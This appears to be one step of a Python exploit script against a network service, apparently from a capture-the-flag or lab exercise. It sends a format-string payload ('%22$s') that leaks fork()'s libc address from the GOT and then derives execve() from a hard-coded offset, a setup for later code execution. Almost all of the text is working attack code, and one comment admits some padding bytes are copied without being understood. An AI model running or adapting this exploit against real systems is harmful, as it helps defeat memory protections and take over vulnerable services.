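# Step 1c --- Get the address of execve
#
# Leak the libc address of fork() through the format-string bug, then derive
# execve() from it.  Two numbers in this step are environment-specific and
# must be re-derived for any other target:
#   * the "%22$s" argument index, which depends on where our input lands on
#     the stack relative to printf's argument pointer;
#   * the fork -> execve delta, which is only valid for the exact libc build
#     on the target (recompute with e.g. `nm -D libc.so.6 | grep -wE 'fork|execve'`).
FORK_TO_EXECVE_OFFSET = 0x320

# Payload: the raw 4-byte GOT address of fork, followed by "%22$s" so printf
# dereferences that address and prints the libc pointer stored there.
# ":ENFORK:" is a sentinel that lets us find the end of the leaked bytes.
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"

nc.read_until("Your choice: ")
nc.write("1" + "\n")
nc.read_until("Insert name: ")
# Pad the name to exactly 100 bytes.  The trailing "\x01\x01"*4 + "\xFF\xFF"
# is kept verbatim from the original exploit; what it fills is not visible
# in this step — TODO confirm against the target's input layout.
nc.write(LEAKFORKADDR + "A" * (100 - len(LEAKFORKADDR)) + "\x01\x01" * 4 + "\xFF\xFF" + "\n")
nc.read_until("Uranium in nuclear plant \"")

# The service echoes the name back: 4 raw GOT-address bytes, then the leaked
# pointer as printed by %s (up to the first NUL), then the 8-byte sentinel.
leaked = nc.read_until(":ENFORK:")[4:-8]
if len(leaked) != 4:
    # %s stops at the first NUL, so a libc address containing a 0x00 byte
    # comes back truncated.  Decoding a short string would silently yield a
    # wrong address and corrupt every later step; fail loudly instead.
    raise RuntimeError("fork leak returned %d byte(s), expected 4: %r" % (len(leaked), leaked))
addrfork = bitstring_to_dword(leaked)
addrexecve = addrfork + FORK_TO_EXECVE_OFFSET

# %-formatting keeps the output identical under Python 2 and Python 3
# (a Py2 `print a, b` statement is a syntax error on Py3).
print("[+] Address of fork : %s" % hex(addrfork))
print(" > Address of execve : %s" % hex(addrexecve))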